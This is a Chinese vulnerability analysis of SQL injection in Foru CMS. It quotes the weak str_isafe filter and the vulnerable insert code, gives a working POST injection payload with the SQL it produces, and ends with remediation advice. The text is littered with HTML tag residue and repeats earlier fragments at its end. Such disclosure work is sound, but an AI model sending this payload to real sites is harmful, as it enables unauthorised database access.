Foru CMS SQL注入漏洞分析与利用<\/h1>

1. 漏洞概述<\/h2>
Foru CMS存在SQL注入漏洞，主要原因是其过滤函数`str_isafe()<\/code>设计不当，导致攻击者可以绕过过滤机制执行恶意SQL语句。该漏洞影响使用arr_insert()<\/code>和arr_update()<\/code>函数处理用户输入的所有场景。<\/p>`

2. 漏洞原理分析<\/h2>
2.1 过滤函数缺陷<\/h3>
系统提供了两个关键过滤函数：<\/p>
\/\/ 返回可安全执行的SQL,带html格式
<\/span><\/span><\/span><\/span>function<\/span> str_isafe<\/span>($str) {
<\/span><\/span>  $tmp =<\/span> array<\/span>('SELECT '<\/span>, 'insert '<\/span>, 'update '<\/span>, 'delete '<\/span>, ' and'<\/span>, 'drop table'<\/span>, 'script'<\/span>, '*'<\/span>, '%'<\/span>, 'eval'<\/span>);
<\/span><\/span>  $tmp_re =<\/span> array<\/span>('sel&#101;ct '<\/span>, 'ins&#101;rt '<\/span>, 'up&#100;ate '<\/span>, 'del&#101;te '<\/span>, ' an&#100;'<\/span>, 'dro&#112; table'<\/span>, '&#115;cript'<\/span>, '&#42;'<\/span>, '&#37;'<\/span>, '$#101;val'<\/span>);
<\/span><\/span>  return<\/span> str_replace<\/span>($tmp, $tmp_re, trim<\/span>($str));
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 返回可安全执行的SQL,不带html格式
<\/span><\/span><\/span><\/span>function<\/span> str_safe<\/span>($str) {
<\/span><\/span>  return<\/span> str_isafe<\/span>(htmlspecialchars<\/span>($str));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>问题在于：<\/p>

str_isafe()<\/code>仅进行了简单的字符串替换，没有有效防止SQL注入<\/li>
替换列表不完整，许多SQL关键词未被过滤<\/li>
替换后的字符串仍可被数据库解析为原始关键词<\/li>
<\/ol>
2.2 危险函数实现<\/h3>
系统提供了两个用于构建SQL语句的函数：<\/p>
\/\/ 插入数据数组处理
<\/span><\/span><\/span><\/span>function<\/span> arr_insert<\/span>($arr) {
<\/span><\/span>  foreach<\/span> ($arr as<\/span> $k =><\/span> $v) {
<\/span><\/span>    $tmp_key[] =<\/span> "`"<\/span> .<\/span> str_safe<\/span>($k) .<\/span> "`"<\/span>;
<\/span><\/span>    $tmp_value[] =<\/span> "'"<\/span> .<\/span> str_isafe<\/span>($v) .<\/span> "'"<\/span>;
<\/span><\/span>  }
<\/span><\/span>  return<\/span> "("<\/span>.<\/span>implode<\/span>(','<\/span>, $tmp_key).<\/span>") VALUES ("<\/span>.<\/span>implode<\/span>(','<\/span>, $tmp_value).<\/span>")"<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 更新数据数组处理
<\/span><\/span><\/span><\/span>function<\/span> arr_update<\/span>($arr) {
<\/span><\/span>  $tmp =<\/span> ''<\/span>;
<\/span><\/span>  foreach<\/span> ($arr as<\/span> $k =><\/span> $v) {
<\/span><\/span>    $tmp .=<\/span> "`"<\/span> .<\/span> str_safe<\/span>($k) .<\/span> "` = '"<\/span> .<\/span> str_isafe<\/span>($v) .<\/span> "',"<\/span>;
<\/span><\/span>  }
<\/span><\/span>  return<\/span> rtrim<\/span>($tmp, ','<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键问题：<\/p>

对字段名使用str_safe()<\/code>过滤（相对安全）<\/li>
对字段值使用str_isafe()<\/code>过滤（不安全）<\/li>
直接将用户输入拼接到SQL语句中<\/li>
<\/ol>
3. 漏洞利用分析<\/h2>
3.1 漏洞位置示例<\/h3>
ForU-CMS\admin\cms_chip.php<\/code>中的代码：<\/p>
if<\/span> ($act ==<\/span> 'add'<\/span>) {
<\/span><\/span>  $data['c_name'<\/span>] =<\/span> $_POST['c_name'<\/span>];
<\/span><\/span>  $data['c_code'<\/span>] =<\/span> $_POST['c_code'<\/span>];
<\/span><\/span>  $data['c_content'<\/span>] =<\/span> $_POST['c_content'<\/span>];
<\/span><\/span>  $data['c_safe'<\/span>] =<\/span> $_POST['c_safe'<\/span>];
<\/span><\/span>  null_back<\/span>($data['c_name'<\/span>],'请填写碎片名称！'<\/span>);
<\/span><\/span>
<\/span><\/span>  $sql =<\/span> "INSERT INTO chip "<\/span> .<\/span> arr_insert<\/span>($data);
<\/span><\/span>  $dataops-><\/span>ops<\/span>($sql, '碎片新增'<\/span>, 1<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.2 利用Payload<\/h3>
构造以下Payload进行注入：<\/p>
c_name=kkk','1','1','1');select user()#&c_code=11111&c_content=111111&c_safe=0&submit=&act=add
<\/code><\/pre>
这个Payload会形成如下SQL语句：<\/p>
INSERT<\/span> INTO<\/span> chip (`<\/span>c_name`<\/span>,`<\/span>c_code`<\/span>,`<\/span>c_content`<\/span>,`<\/span>c_safe`<\/span>) VALUES<\/span> ('kkk'<\/span>,'1'<\/span>,'1'<\/span>,'1'<\/span>);select<\/span> user<\/span>()#<\/span>','<\/span>11111<\/span>','<\/span>111111<\/span>','<\/span>0<\/span>')
<\/span><\/span><\/span><\/code><\/pre>3.3 利用特点<\/h3>

使用注释符#<\/code>截断原始SQL语句<\/li>
添加新的SQL语句select user()<\/code>执行<\/li>
需要闭合原始SQL语句的括号和引号<\/li>
<\/ol>
4. 漏洞修复建议<\/h2>
4.1 短期修复方案<\/h3>

修改str_isafe()<\/code>函数，增加更多SQL关键词过滤<\/li>
对所有用户输入使用str_safe()<\/code>而非str_isafe()<\/code><\/li>
<\/ol>
4.2 长期修复方案<\/h3>

使用预处理语句(PDO prepared statements)替代字符串拼接<\/li>
实现白名单机制验证输入<\/li>
对不同类型的输入实现专门的过滤函数<\/li>
<\/ol>
4.3 代码示例改进<\/h3>
\/\/ 使用预处理语句的改进版本
<\/span><\/span><\/span><\/span>if<\/span> ($act ==<\/span> 'add'<\/span>) {
<\/span><\/span>  $stmt =<\/span> $this-><\/span>_db<\/span>-><\/span>prepare<\/span>("INSERT INTO chip (c_name, c_code, c_content, c_safe) VALUES (?, ?, ?, ?)"<\/span>);
<\/span><\/span>  $stmt-><\/span>execute<\/span>([
<\/span><\/span>    $_POST['c_name'<\/span>],
<\/span><\/span>    $_POST['c_code'<\/span>],
<\/span><\/span>    $_POST['c_content'<\/span>],
<\/span><\/span>    $_POST['c_safe'<\/span>]
<\/span><\/span>  ]);
<\/span><\/span>  
<\/span><\/span>  if<\/span> ($stmt-><\/span>rowCount<\/span>() ><\/span> 0<\/span>) {
<\/span><\/span>    admin_log<\/span>('碎片新增'<\/span>);
<\/span><\/span>    $this-><\/span>href<\/span>(1<\/span>, ''<\/span>, ''<\/span>);
<\/span><\/span>  } else<\/span> {
<\/span><\/span>    alert_back<\/span>($GLOBALS['lang'<\/span>]['msg_failed'<\/span>]);
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. 漏洞影响范围<\/h2>
所有使用arr_insert()<\/code>或arr_update()<\/code>函数处理用户输入的地方都可能存在SQL注入风险，包括但不限于：<\/p>

碎片管理功能<\/li>
文章发布功能<\/li>
用户管理功能<\/li>
系统配置功能<\/li>
<\/ul>
6. 防御措施<\/h2>

输入验证<\/strong>：实现严格的白名单输入验证<\/li>
参数化查询<\/strong>：使用PDO或MySQLi的预处理语句<\/li>
最小权限原则<\/strong>：数据库用户应仅具有必要权限<\/li>
错误处理<\/strong>：避免显示原始数据库错误信息<\/li>
WAF防护<\/strong>：部署Web应用防火墙拦截恶意请求<\/li>
<\/ol>
7. 总结<\/h2>
Foru CMS的SQL注入漏洞源于不完善的输入过滤和危险的SQL拼接方式。开发者应避免直接拼接用户输入到SQL语句中，转而使用预处理语句等更安全的方式与数据库交互。该漏洞的利用门槛较低，危害较大，建议用户及时修复。<\/p>

Foru CMS SQL注入漏洞分析与利用<\/h1>

1. 漏洞概述<\/h2> Foru CMS存在SQL注入漏洞，主要原因是其过滤函数str_isafe()<\/code>设计不当，导致攻击者可以绕过过滤机制执行恶意SQL语句。该漏洞影响使用arr_insert()<\/code>和arr_update()<\/code>函数处理用户输入的所有场景。<\/p>

3. 漏洞利用分析<\/h2>

4. 漏洞修复建议<\/h2>

1. 漏洞概述<\/h2>
Foru CMS存在SQL注入漏洞，主要原因是其过滤函数`str_isafe()<\/code>设计不当，导致攻击者可以绕过过滤机制执行恶意SQL语句。该漏洞影响使用arr_insert()<\/code>和arr_update()<\/code>函数处理用户输入的所有场景。<\/p>`